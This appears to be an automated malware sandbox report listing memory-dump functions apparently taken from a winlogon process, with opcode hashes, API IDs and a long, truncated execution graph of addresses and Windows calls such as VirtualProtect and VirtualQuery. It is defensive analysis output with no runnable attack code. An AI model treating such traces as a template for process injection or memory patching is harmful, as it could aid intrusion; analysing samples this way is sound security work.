                                                                                Function 000001E858957356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: b226c5ef1287e80dd1a639188cd00b7be9ee93c87761d6bca3fa593d7edb1d27
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 32E04F61660B84D0DB058F22E8412D873A09F58B64F8891229D5C06311EE38D1E9C300
                                                                                Function 000001E8589B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3376109927.000001E8589B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e8589b0000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: ebbb92f6b71bc6aeecd0247755a998ea3fb1c1d57f03a5a9e81a6553625eb14e
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: FDE08C71A20B88C4DF028F21E8802DCB3A4EF68B68F889133CE4C06311EE38D1E9C300
                                                                                Function 000001E8589573B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3374749098.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858950000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: d79e25d1bddce505cbefe66c1f7dc3f1dcce17b3d3d0eb5f19f21b045c52fa15
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 4AE0B661A61B88D4DB068F62E8912D8B3A5AB68B64FC89122DE5C56355EE38D1E9C300
                                                                                Function 000001E858981BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: bae03b9de4d8a0968d4e15549a5e41e9ffeeedaf31b7d182c916321c4c0c0085
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 4E113D35721BC5C1EA55DB66E8042ADB7A1FB89FC0F184036DE4D57765DE38C4428700
                                                                                Function 000001E858981268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000015.00000002.3375225930.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_21_2_1e858980000_winlogon.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: bf3232b7a1a84d483810c562108e731f4be810f9750f62d4ac0e33b9570d4307
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: D6E03935721684C6EB158BA2D80838ABAE2EB89B46F0480258D0907361EF7D8499C750

                                                                                Execution Graph

                                                                                Execution Coverage:3.4%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1950
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 5019 7ff7f4f2219e 5020 7ff7f4f221ab EnterCriticalSection 5019->5020 5021 7ff7f4f22272 5019->5021 5022 7ff7f4f22265 LeaveCriticalSection 5020->5022 5024 7ff7f4f221c8 5020->5024 5022->5021 5023 7ff7f4f221e9 TlsGetValue GetLastError 5023->5024 5024->5022 5024->5023 3083 7ff7f4f21140 3086 7ff7f4f21160 3083->3086 3085 7ff7f4f21156 3087 7ff7f4f211b9 3086->3087 3088 7ff7f4f2118b 3086->3088 3090 7ff7f4f211c7 _amsg_exit 3087->3090 3091 7ff7f4f211d3 3087->3091 3088->3087 3089 7ff7f4f21190 3088->3089 3089->3087 3092 7ff7f4f211a0 Sleep 3089->3092 3090->3091 3093 7ff7f4f2121a 3091->3093 3094 7ff7f4f21201 _initterm 3091->3094 3092->3087 3092->3089 3111 7ff7f4f21880 3093->3111 3094->3093 3097 7ff7f4f2126a 3098 7ff7f4f2126f malloc 3097->3098 3099 7ff7f4f2128b 3098->3099 3100 7ff7f4f212d2 3098->3100 3101 7ff7f4f212a0 strlen malloc memcpy 3099->3101 3124 7ff7f4f23b60 3100->3124 3101->3101 3102 7ff7f4f212d0 3101->3102 3102->3100 3104 7ff7f4f21315 3105 7ff7f4f21344 3104->3105 3106 7ff7f4f21324 3104->3106 3109 7ff7f4f21160 95 API calls 3105->3109 3107 7ff7f4f21338 3106->3107 3108 7ff7f4f2132d _cexit 3106->3108 3107->3085 3108->3107 3110 7ff7f4f21366 3109->3110 3110->3085 3112 7ff7f4f21247 SetUnhandledExceptionFilter 3111->3112 3113 7ff7f4f218a2 3111->3113 3112->3097 3113->3112 3114 7ff7f4f2194d 3113->3114 3115 7ff7f4f21a20 3113->3115 3116 7ff7f4f2199e 3114->3116 3117 7ff7f4f21956 3114->3117 3115->3116 3119 7ff7f4f21b5c 3115->3119 3121 7ff7f4f21b36 3115->3121 3116->3112 3120 7ff7f4f219e9 VirtualProtect 3116->3120 3117->3116 3312 7ff7f4f21ba0 3117->3312 3120->3116 3122 7ff7f4f21ba0 4 API calls 3121->3122 3123 7ff7f4f21b53 3122->3123 3123->3119 3127 7ff7f4f23b76 3124->3127 3125 7ff7f4f23c70 wcslen 3322 7ff7f4f2153f 3125->3322 3127->3125 3131 7ff7f4f23d70 3134 7ff7f4f23d8a memset wcscat memset 3131->3134 3136 7ff7f4f23de3 3134->3136 3137 7ff7f4f23e33 wcslen 3136->3137 3138 7ff7f4f23e45 3137->3138 3142 7ff7f4f23e8c 3137->3142 3139 7ff7f4f23e60 _wcsnicmp 3138->3139 3140 7ff7f4f23e76 wcslen 3139->3140 3139->3142 3140->3139 3140->3142 3141 7ff7f4f23eed wcscpy wcscat memset 3143 7ff7f4f23f2c 3141->3143 3142->3141 3144 7ff7f4f24034 wcscpy wcscat 3143->3144 3145 7ff7f4f2405f memset 3144->3145 3150 7ff7f4f24141 3144->3150 3146 7ff7f4f24080 3145->3146 3147 7ff7f4f240e5 wcslen 3146->3147 3149 7ff7f4f240fb 3147->3149 3154 7ff7f4f2413c 3147->3154 3151 7ff7f4f24110 _wcsnicmp 3149->3151 3540 7ff7f4f22df0 3150->3540 3152 7ff7f4f24126 wcslen 3151->3152 3151->3154 3152->3151 3152->3154 3153 7ff7f4f242f4 wcscpy wcscat _wcsicmp 3155 7ff7f4f24328 3153->3155 3156 7ff7f4f24341 memset 3153->3156 3154->3153 3552 7ff7f4f214d6 3155->3552 3159 7ff7f4f24362 3156->3159 3158 7ff7f4f243a7 wcscpy wcscat memset 3161 7ff7f4f243ed 3158->3161 3159->3158 3160 7ff7f4f2443d wcscpy wcscat memset 3162 7ff7f4f24483 3160->3162 3161->3160 3163 7ff7f4f244b3 wcscpy wcscat 3162->3163 3164 7ff7f4f26638 memcpy 3163->3164 3165 7ff7f4f244e5 3163->3165 3164->3165 3166 7ff7f4f22df0 11 API calls 3165->3166 3168 7ff7f4f24694 3166->3168 3167 7ff7f4f22df0 11 API calls 3169 7ff7f4f247a8 memset 3167->3169 3168->3167 3171 7ff7f4f247c9 3169->3171 3170 7ff7f4f2480c wcscpy wcscat memset 3173 7ff7f4f24855 3170->3173 3171->3170 3172 7ff7f4f24898 wcscpy wcscat wcslen 3615 7ff7f4f2146d 3172->3615 3173->3172 3176 7ff7f4f249a9 3178 7ff7f4f24a9f wcslen 3176->3178 3185 7ff7f4f24c92 3176->3185 3819 7ff7f4f2157b 3178->3819 3180 7ff7f4f2145e 2 API calls 3180->3176 3184 7ff7f4f24c71 memset 3184->3185 3186 7ff7f4f24d02 wcscpy wcscat 3185->3186 3190 7ff7f4f24d34 3186->3190 3187 7ff7f4f24c04 wcslen 3869 7ff7f4f215e4 3187->3869 3188 7ff7f4f24b5e 3188->3184 3188->3187 3193 7ff7f4f22df0 11 API calls 3190->3193 3192 7ff7f4f2145e 2 API calls 3192->3184 3194 7ff7f4f24e3c 3193->3194 3195 7ff7f4f22df0 11 API calls 3194->3195 3197 7ff7f4f24f51 3195->3197 3196 7ff7f4f22df0 11 API calls 3199 7ff7f4f2503e 3196->3199 3197->3196 3198 7ff7f4f22df0 11 API calls 3200 7ff7f4f25124 3198->3200 3199->3198 3872 7ff7f4f22f70 3200->3872 3202 7ff7f4f2513f 3876 7ff7f4f238f0 3202->3876 3207 7ff7f4f251a2 3209 7ff7f4f251ba 3207->3209 3210 7ff7f4f26935 memcpy 3207->3210 3208 7ff7f4f2145e 2 API calls 3208->3207 3211 7ff7f4f252ad wcslen 3209->3211 3210->3209 3212 7ff7f4f2157b 2 API calls 3211->3212 3213 7ff7f4f25337 3212->3213 3214 7ff7f4f2533f memset 3213->3214 3218 7ff7f4f25451 3213->3218 3215 7ff7f4f25360 3214->3215 3216 7ff7f4f253b0 wcslen 3215->3216 3966 7ff7f4f215a8 3216->3966 3217 7ff7f4f22df0 11 API calls 3225 7ff7f4f254f4 3217->3225 3218->3217 3226 7ff7f4f25634 _wcsicmp 3218->3226 3221 7ff7f4f25420 _wcsnicmp 3222 7ff7f4f25445 3221->3222 3228 7ff7f4f25c91 3221->3228 3223 7ff7f4f2145e 2 API calls 3222->3223 3223->3218 3224 7ff7f4f22df0 11 API calls 3224->3226 3225->3224 3229 7ff7f4f2564f memset 3226->3229 3244 7ff7f4f259ca 3226->3244 3227 7ff7f4f25cee wcslen 3230 7ff7f4f215a8 2 API calls 3227->3230 3228->3227 3234 7ff7f4f25673 3229->3234 3231 7ff7f4f25d4a 3230->3231 3235 7ff7f4f2145e 2 API calls 3231->3235 3232 7ff7f4f25aaa wcslen 3236 7ff7f4f2153f 2 API calls 3232->3236 3233 7ff7f4f256b8 wcscpy wcscat wcslen 3237 7ff7f4f2146d 2 API calls 3233->3237 3234->3233 3235->3218 3239 7ff7f4f25b35 3236->3239 3238 7ff7f4f25785 3237->3238 3983 7ff7f4f21530 3238->3983 3241 7ff7f4f2145e 2 API calls 3239->3241 3243 7ff7f4f25b46 3241->3243 3252 7ff7f4f22f70 2 API calls 3243->3252 3253 7ff7f4f25bd2 3243->3253 3244->3232 3245 7ff7f4f26da9 3247 7ff7f4f2145e 2 API calls 3245->3247 3246 7ff7f4f257c3 4028 7ff7f4f214a9 3246->4028 3250 7ff7f4f26db5 3247->3250 3249 7ff7f4f25c2f wcslen 3254 7ff7f4f25c45 3249->3254 3275 7ff7f4f25c8c 3249->3275 3250->3104 3256 7ff7f4f25b6f 3252->3256 3253->3249 3257 7ff7f4f25c60 _wcsnicmp 3254->3257 3255 7ff7f4f2585f 3260 7ff7f4f2145e 2 API calls 3255->3260 3259 7ff7f4f238f0 11 API calls 3256->3259 3261 7ff7f4f25c76 wcslen 3257->3261 3257->3275 3263 7ff7f4f25b8c 3259->3263 3264 7ff7f4f25853 3260->3264 3261->3257 3261->3275 3267 7ff7f4f214c7 2 API calls 3263->3267 4204 7ff7f4f23350 memset 3264->4204 3265 7ff7f4f25df9 memset wcscpy wcscat 3269 7ff7f4f22f70 2 API calls 3265->3269 3266 7ff7f4f25847 3270 7ff7f4f2145e 2 API calls 3266->3270 3271 7ff7f4f25bc4 3267->3271 3273 7ff7f4f25e50 3269->3273 3270->3264 3271->3253 3277 7ff7f4f2145e 2 API calls 3271->3277 3276 7ff7f4f23350 11 API calls 3273->3276 3274 7ff7f4f214c7 2 API calls 3282 7ff7f4f258ae 3274->3282 3275->3265 3278 7ff7f4f25e68 3276->3278 3277->3253 3279 7ff7f4f214c7 2 API calls 3278->3279 3280 7ff7f4f25e96 memset 3279->3280 3283 7ff7f4f25eb7 3280->3283 3281 7ff7f4f22df0 11 API calls 3290 7ff7f4f25937 3281->3290 3282->3281 3284 7ff7f4f25f07 wcslen 3283->3284 3285 7ff7f4f25f57 wcscat memset 3284->3285 3286 7ff7f4f25f19 3284->3286 3292 7ff7f4f25f91 3285->3292 3287 7ff7f4f25f30 _wcsnicmp 3286->3287 3287->3285 3289 7ff7f4f25f42 wcslen 3287->3289 3289->3285 3289->3287 3291 7ff7f4f22df0 11 API calls 3290->3291 3294 7ff7f4f24217 3291->3294 3293 7ff7f4f25fe1 wcscpy wcscat 3292->3293 3296 7ff7f4f26016 3293->3296 3294->3104 3295 7ff7f4f26d1d memcpy 3298 7ff7f4f26153 3295->3298 3296->3295 3296->3298 3297 7ff7f4f2620f wcslen 3299 7ff7f4f2153f 2 API calls 3297->3299 3298->3297 3300 7ff7f4f2629a 3299->3300 3301 7ff7f4f2145e 2 API calls 3300->3301 3302 7ff7f4f262ab 3301->3302 3303 7ff7f4f26343 3302->3303 3305 7ff7f4f22f70 2 API calls 3302->3305 3304 7ff7f4f2145e 2 API calls 3303->3304 3304->3294 3306 7ff7f4f262d8 3305->3306 3307 7ff7f4f238f0 11 API calls 3306->3307 3308 7ff7f4f262fd 3307->3308 3309 7ff7f4f214c7 2 API calls 3308->3309 3310 7ff7f4f26335 3309->3310 3310->3303 3311 7ff7f4f2145e 2 API calls 3310->3311 3311->3303 3313 7ff7f4f21bc2 3312->3313 3315 7ff7f4f21c45 VirtualQuery 3313->3315 3316 7ff7f4f21cf4 3313->3316 3319 7ff7f4f21c04 memcpy 3313->3319 3315->3316 3321 7ff7f4f21c72 3315->3321 3317 7ff7f4f21d23 GetLastError 3316->3317 3318 7ff7f4f21d37 3317->3318 3319->3117 3320 7ff7f4f21ca4 VirtualProtect 3320->3317 3320->3319 3321->3319 3321->3320 4220 7ff7f4f21394 3322->4220 3324 7ff7f4f2154e 3325 7ff7f4f21394 2 API calls 3324->3325 3326 7ff7f4f21558 3325->3326 3327 7ff7f4f2155d 3326->3327 3328 7ff7f4f21394 2 API calls 3326->3328 3329 7ff7f4f21394 2 API calls 3327->3329 3328->3327 3330 7ff7f4f21567 3329->3330 3331 7ff7f4f2156c 3330->3331 3332 7ff7f4f21394 2 API calls 3330->3332 3333 7ff7f4f21394 2 API calls 3331->3333 3332->3331 3334 7ff7f4f21576 3333->3334 3335 7ff7f4f2157b 3334->3335 3336 7ff7f4f21394 2 API calls 3334->3336 3337 7ff7f4f21394 2 API calls 3335->3337 3336->3335 3338 7ff7f4f21585 3337->3338 3339 7ff7f4f2158a 3338->3339 3340 7ff7f4f21394 2 API calls 3338->3340 3341 7ff7f4f21394 2 API calls 3339->3341 3340->3339 3342 7ff7f4f21599 3341->3342 3343 7ff7f4f21394 2 API calls 3342->3343 3344 7ff7f4f215a3 3343->3344 3345 7ff7f4f215a8 3344->3345 3346 7ff7f4f21394 2 API calls 3344->3346 3347 7ff7f4f21394 2 API calls 3345->3347 3346->3345 3348 7ff7f4f215b7 3347->3348 3349 7ff7f4f21394 2 API calls 3348->3349 3350 7ff7f4f215c1 3349->3350 3351 7ff7f4f215c6 3350->3351 3352 7ff7f4f21394 2 API calls 3350->3352 3353 7ff7f4f21394 2 API calls 3351->3353 3352->3351 3354 7ff7f4f215d0 3353->3354 3355 7ff7f4f215d5 3354->3355 3356 7ff7f4f21394 2 API calls 3354->3356 3357 7ff7f4f21394 2 API calls 3355->3357 3356->3355 3358 7ff7f4f215df 3357->3358 3359 7ff7f4f215e4 3358->3359 3360 7ff7f4f21394 2 API calls 3358->3360 3361 7ff7f4f21394 2 API calls 3359->3361 3360->3359 3362 7ff7f4f215f3 3361->3362 3362->3294 3363 7ff7f4f21503 3362->3363 3364 7ff7f4f21394 2 API calls 3363->3364 3365 7ff7f4f21512 3364->3365 3366 7ff7f4f21394 2 API calls 3365->3366 3367 7ff7f4f21521 3366->3367 3368 7ff7f4f21530 3367->3368 3369 7ff7f4f21394 2 API calls 3367->3369 3370 7ff7f4f21394 2 API calls 3368->3370 3369->3368 3371 7ff7f4f2153a 3370->3371 3372 7ff7f4f2153f 3371->3372 3373 7ff7f4f21394 2 API calls 3371->3373 3374 7ff7f4f21394 2 API calls 3372->3374 3373->3372 3375 7ff7f4f2154e 3374->3375 3376 7ff7f4f21394 2 API calls 3375->3376 3377 7ff7f4f21558 3376->3377 3378 7ff7f4f2155d 3377->3378 3379 7ff7f4f21394 2 API calls 3377->3379 3380 7ff7f4f21394 2 API calls 3378->3380 3379->3378 3381 7ff7f4f21567 3380->3381 3382 7ff7f4f2156c 3381->3382 3383 7ff7f4f21394 2 API calls 3381->3383 3384 7ff7f4f21394 2 API calls 3382->3384 3383->3382 3385 7ff7f4f21576 3384->3385 3386 7ff7f4f2157b 3385->3386 3387 7ff7f4f21394 2 API calls 3385->3387 3388 7ff7f4f21394 2 API calls 3386->3388 3387->3386 3389 7ff7f4f21585 3388->3389 3390 7ff7f4f2158a 3389->3390 3391 7ff7f4f21394 2 API calls 3389->3391 3392 7ff7f4f21394 2 API calls 3390->3392 3391->3390 3393 7ff7f4f21599 3392->3393 3394 7ff7f4f21394 2 API calls 3393->3394 3395 7ff7f4f215a3 3394->3395 3396 7ff7f4f215a8 3395->3396 3397 7ff7f4f21394 2 API calls 3395->3397 3398 7ff7f4f21394 2 API calls 3396->3398 3397->3396 3399 7ff7f4f215b7 3398->3399 3400 7ff7f4f21394 2 API calls 3399->3400 3401 7ff7f4f215c1 3400->3401 3402 7ff7f4f215c6 3401->3402 3403 7ff7f4f21394 2 API calls 3401->3403 3404 7ff7f4f21394 2 API calls 3402->3404 3403->3402 3405 7ff7f4f215d0 3404->3405 3406 7ff7f4f215d5 3405->3406 3407 7ff7f4f21394 2 API calls 3405->3407 3408 7ff7f4f21394 2 API calls 3406->3408 3407->3406 3409 7ff7f4f215df 3408->3409 3410 7ff7f4f215e4 3409->3410 3411 7ff7f4f21394 2 API calls 3409->3411 3412 7ff7f4f21394 2 API calls 3410->3412 3411->3410 3413 7ff7f4f215f3 3412->3413 3413->3131 3414 7ff7f4f2156c 3413->3414 3415 7ff7f4f21394 2 API calls 3414->3415 3416 7ff7f4f21576 3415->3416 3417 7ff7f4f2157b 3416->3417 3418 7ff7f4f21394 2 API calls 3416->3418 3419 7ff7f4f21394 2 API calls 3417->3419 3418->3417 3420 7ff7f4f21585 3419->3420 3421 7ff7f4f2158a 3420->3421 3422 7ff7f4f21394 2 API calls 3420->3422 3423 7ff7f4f21394 2 API calls 3421->3423 3422->3421 3424 7ff7f4f21599 3423->3424 3425 7ff7f4f21394 2 API calls 3424->3425 3426 7ff7f4f215a3 3425->3426 3427 7ff7f4f215a8 3426->3427 3428 7ff7f4f21394 2 API calls 3426->3428 3429 7ff7f4f21394 2 API calls 3427->3429 3428->3427 3430 7ff7f4f215b7 3429->3430 3431 7ff7f4f21394 2 API calls 3430->3431 3432 7ff7f4f215c1 3431->3432 3433 7ff7f4f215c6 3432->3433 3434 7ff7f4f21394 2 API calls 3432->3434 3435 7ff7f4f21394 2 API calls 3433->3435 3434->3433 3436 7ff7f4f215d0 3435->3436 3437 7ff7f4f215d5 3436->3437 3438 7ff7f4f21394 2 API calls 3436->3438 3439 7ff7f4f21394 2 API calls 3437->3439 3438->3437 3440 7ff7f4f215df 3439->3440 3441 7ff7f4f215e4 3440->3441 3442 7ff7f4f21394 2 API calls 3440->3442 3443 7ff7f4f21394 2 API calls 3441->3443 3442->3441 3444 7ff7f4f215f3 3443->3444 3444->3131 3445 7ff7f4f2145e 3444->3445 3446 7ff7f4f21394 2 API calls 3445->3446 3447 7ff7f4f21468 3446->3447 3448 7ff7f4f2146d 3447->3448 3449 7ff7f4f21394 2 API calls 3447->3449 3450 7ff7f4f21394 2 API calls 3448->3450 3449->3448 3451 7ff7f4f21477 3450->3451 3452 7ff7f4f2147c 3451->3452 3453 7ff7f4f21394 2 API calls 3451->3453 3454 7ff7f4f21394 2 API calls 3452->3454 3453->3452 3455 7ff7f4f21486 3454->3455 3456 7ff7f4f2148b 3455->3456 3457 7ff7f4f21394 2 API calls 3455->3457 3458 7ff7f4f21394 2 API calls 3456->3458 3457->3456 3459 7ff7f4f21495 3458->3459 3460 7ff7f4f2149a 3459->3460 3461 7ff7f4f21394 2 API calls 3459->3461 3462 7ff7f4f21394 2 API calls 3460->3462 3461->3460 3463 7ff7f4f214a4 3462->3463 3464 7ff7f4f214a9 3463->3464 3465 7ff7f4f21394 2 API calls 3463->3465 3466 7ff7f4f21394 2 API calls 3464->3466 3465->3464 3467 7ff7f4f214b3 3466->3467 3468 7ff7f4f214b8 3467->3468 3469 7ff7f4f21394 2 API calls 3467->3469 3470 7ff7f4f21394 2 API calls 3468->3470 3469->3468 3471 7ff7f4f214c2 3470->3471 3472 7ff7f4f214c7 3471->3472 3473 7ff7f4f21394 2 API calls 3471->3473 3474 7ff7f4f21394 2 API calls 3472->3474 3473->3472 3475 7ff7f4f214d1 3474->3475 3476 7ff7f4f214d6 3475->3476 3477 7ff7f4f21394 2 API calls 3475->3477 3478 7ff7f4f21394 2 API calls 3476->3478 3477->3476 3479 7ff7f4f214e0 3478->3479 3480 7ff7f4f214e5 3479->3480 3481 7ff7f4f21394 2 API calls 3479->3481 3482 7ff7f4f21394 2 API calls 3480->3482 3481->3480 3483 7ff7f4f214ef 3482->3483 3484 7ff7f4f214f4 3483->3484 3485 7ff7f4f21394 2 API calls 3483->3485 3486 7ff7f4f21394 2 API calls 3484->3486 3485->3484 3487 7ff7f4f214fe 3486->3487 3488 7ff7f4f21394 2 API calls 3487->3488 3489 7ff7f4f21503 3488->3489 3490 7ff7f4f21394 2 API calls 3489->3490 3491 7ff7f4f21512 3490->3491 3492 7ff7f4f21394 2 API calls 3491->3492 3493 7ff7f4f21521 3492->3493 3494 7ff7f4f21530 3493->3494 3495 7ff7f4f21394 2 API calls 3493->3495 3496 7ff7f4f21394 2 API calls 3494->3496 3495->3494 3497 7ff7f4f2153a 3496->3497 3498 7ff7f4f2153f 3497->3498 3499 7ff7f4f21394 2 API calls 3497->3499 3500 7ff7f4f21394 2 API calls 3498->3500 3499->3498 3501 7ff7f4f2154e 3500->3501 3502 7ff7f4f21394 2 API calls 3501->3502 3503 7ff7f4f21558 3502->3503 3504 7ff7f4f2155d 3503->3504 3505 7ff7f4f21394 2 API calls 3503->3505 3506 7ff7f4f21394 2 API calls 3504->3506 3505->3504 3507 7ff7f4f21567 3506->3507 3508 7ff7f4f2156c 3507->3508 3509 7ff7f4f21394 2 API calls 3507->3509 3510 7ff7f4f21394 2 API calls 3508->3510 3509->3508 3511 7ff7f4f21576 3510->3511 3512 7ff7f4f2157b 3511->3512 3513 7ff7f4f21394 2 API calls 3511->3513 3514 7ff7f4f21394 2 API calls 3512->3514 3513->3512 3515 7ff7f4f21585 3514->3515 3516 7ff7f4f2158a 3515->3516 3517 7ff7f4f21394 2 API calls 3515->3517 3518 7ff7f4f21394 2 API calls 3516->3518 3517->3516 3519 7ff7f4f21599 3518->3519 3520 7ff7f4f21394 2 API calls 3519->3520 3521 7ff7f4f215a3 3520->3521 3522 7ff7f4f215a8 3521->3522 3523 7ff7f4f21394 2 API calls 3521->3523 3524 7ff7f4f21394 2 API calls 3522->3524 3523->3522 3525 7ff7f4f215b7 3524->3525 3526 7ff7f4f21394 2 API calls 3525->3526 3527 7ff7f4f215c1 3526->3527 3528 7ff7f4f215c6 3527->3528 3529 7ff7f4f21394 2 API calls 3527->3529 3530 7ff7f4f21394 2 API calls 3528->3530 3529->3528 3531 7ff7f4f215d0 3530->3531 3532 7ff7f4f215d5 3531->3532 3533 7ff7f4f21394 2 API calls 3531->3533 3534 7ff7f4f21394 2 API calls 3532->3534 3533->3532 3535 7ff7f4f215df 3534->3535 3536 7ff7f4f215e4 3535->3536 3537 7ff7f4f21394 2 API calls 3535->3537 3538 7ff7f4f21394 2 API calls 3536->3538 3537->3536 3539 7ff7f4f215f3 3538->3539 3539->3131 4230 7ff7f4f22660 3540->4230 3545 7ff7f4f2145e 2 API calls 3546 7ff7f4f22f35 3545->3546 3548 7ff7f4f22f53 3546->3548 4265 7ff7f4f21512 3546->4265 3547 7ff7f4f22e3c 4232 7ff7f4f22690 3547->4232 3550 7ff7f4f2145e 2 API calls 3548->3550 3551 7ff7f4f22f5d 3550->3551 3551->3294 3553 7ff7f4f21394 2 API calls 3552->3553 3554 7ff7f4f214e0 3553->3554 3555 7ff7f4f214e5 3554->3555 3556 7ff7f4f21394 2 API calls 3554->3556 3557 7ff7f4f21394 2 API calls 3555->3557 3556->3555 3558 7ff7f4f214ef 3557->3558 3559 7ff7f4f214f4 3558->3559 3560 7ff7f4f21394 2 API calls 3558->3560 3561 7ff7f4f21394 2 API calls 3559->3561 3560->3559 3562 7ff7f4f214fe 3561->3562 3563 7ff7f4f21394 2 API calls 3562->3563 3564 7ff7f4f21503 3563->3564 3565 7ff7f4f21394 2 API calls 3564->3565 3566 7ff7f4f21512 3565->3566 3567 7ff7f4f21394 2 API calls 3566->3567 3568 7ff7f4f21521 3567->3568 3569 7ff7f4f21530 3568->3569 3570 7ff7f4f21394 2 API calls 3568->3570 3571 7ff7f4f21394 2 API calls 3569->3571 3570->3569 3572 7ff7f4f2153a 3571->3572 3573 7ff7f4f2153f 3572->3573 3574 7ff7f4f21394 2 API calls 3572->3574 3575 7ff7f4f21394 2 API calls 3573->3575 3574->3573 3576 7ff7f4f2154e 3575->3576 3577 7ff7f4f21394 2 API calls 3576->3577 3578 7ff7f4f21558 3577->3578 3579 7ff7f4f2155d 3578->3579 3580 7ff7f4f21394 2 API calls 3578->3580 3581 7ff7f4f21394 2 API calls 3579->3581 3580->3579 3582 7ff7f4f21567 3581->3582 3583 7ff7f4f2156c 3582->3583 3584 7ff7f4f21394 2 API calls 3582->3584 3585 7ff7f4f21394 2 API calls 3583->3585 3584->3583 3586 7ff7f4f21576 3585->3586 3587 7ff7f4f2157b 3586->3587 3588 7ff7f4f21394 2 API calls 3586->3588 3589 7ff7f4f21394 2 API calls 3587->3589 3588->3587 3590 7ff7f4f21585 3589->3590 3591 7ff7f4f2158a 3590->3591 3592 7ff7f4f21394 2 API calls 3590->3592 3593 7ff7f4f21394 2 API calls 3591->3593 3592->3591 3594 7ff7f4f21599 3593->3594 3595 7ff7f4f21394 2 API calls 3594->3595 3596 7ff7f4f215a3 3595->3596 3597 7ff7f4f215a8 3596->3597 3598 7ff7f4f21394 2 API calls 3596->3598 3599 7ff7f4f21394 2 API calls 3597->3599 3598->3597 3600 7ff7f4f215b7 3599->3600 3601 7ff7f4f21394 2 API calls 3600->3601 3602 7ff7f4f215c1 3601->3602 3603 7ff7f4f215c6 3602->3603 3604 7ff7f4f21394 2 API calls 3602->3604 3605 7ff7f4f21394 2 API calls 3603->3605 3604->3603 3606 7ff7f4f215d0 3605->3606 3607 7ff7f4f215d5 3606->3607 3608 7ff7f4f21394 2 API calls 3606->3608 3609 7ff7f4f21394 2 API calls 3607->3609 3608->3607 3610 7ff7f4f215df 3609->3610 3611 7ff7f4f215e4 3610->3611 3612 7ff7f4f21394 2 API calls 3610->3612 3613 7ff7f4f21394 2 API calls 3611->3613 3612->3611 3614 7ff7f4f215f3 3613->3614 3614->3156 3616 7ff7f4f21394 2 API calls 3615->3616 3617 7ff7f4f21477 3616->3617 3618 7ff7f4f2147c 3617->3618 3619 7ff7f4f21394 2 API calls 3617->3619 3620 7ff7f4f21394 2 API calls 3618->3620 3619->3618 3621 7ff7f4f21486 3620->3621 3622 7ff7f4f2148b 3621->3622 3623 7ff7f4f21394 2 API calls 3621->3623 3624 